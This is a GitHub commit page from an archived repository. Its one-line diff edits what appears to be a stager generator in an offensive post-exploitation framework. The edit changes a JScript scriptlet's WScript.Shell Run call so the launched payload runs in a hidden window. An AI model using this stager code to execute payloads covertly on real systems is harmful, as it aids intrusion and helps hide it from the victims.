Skip to content
This repository has been archived by the owner on Jan 29, 2020. It is now read-only.

Commit

Permalink
Fix for issue 376
Browse files Browse the repository at this point in the history
  • Loading branch information
rvrsh3ll committed Oct 24, 2016
1 parent 6bb2e87 commit 654bc8c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion lib/stagers/launcher_sct.py
Original file line number Diff line number Diff line change
Expand Up @@ -99,7 +99,7 @@ def generate(self):
code += " >\n"
code += " <script language=\"JScript\">\n"
code += " <![CDATA[\n"
code += " var r = new ActiveXObject(\"WScript.Shell\").Run(\"" + launcher + "\");\n"
code += " var r = new ActiveXObject(\"WScript.Shell\").Run(\"" + launcher + "\",0);\n"
code += " ]]>\n"
code += " </script>\n"
code += "</registration>\n"
Expand Down

0 comments on commit 654bc8c

Please sign in to comment.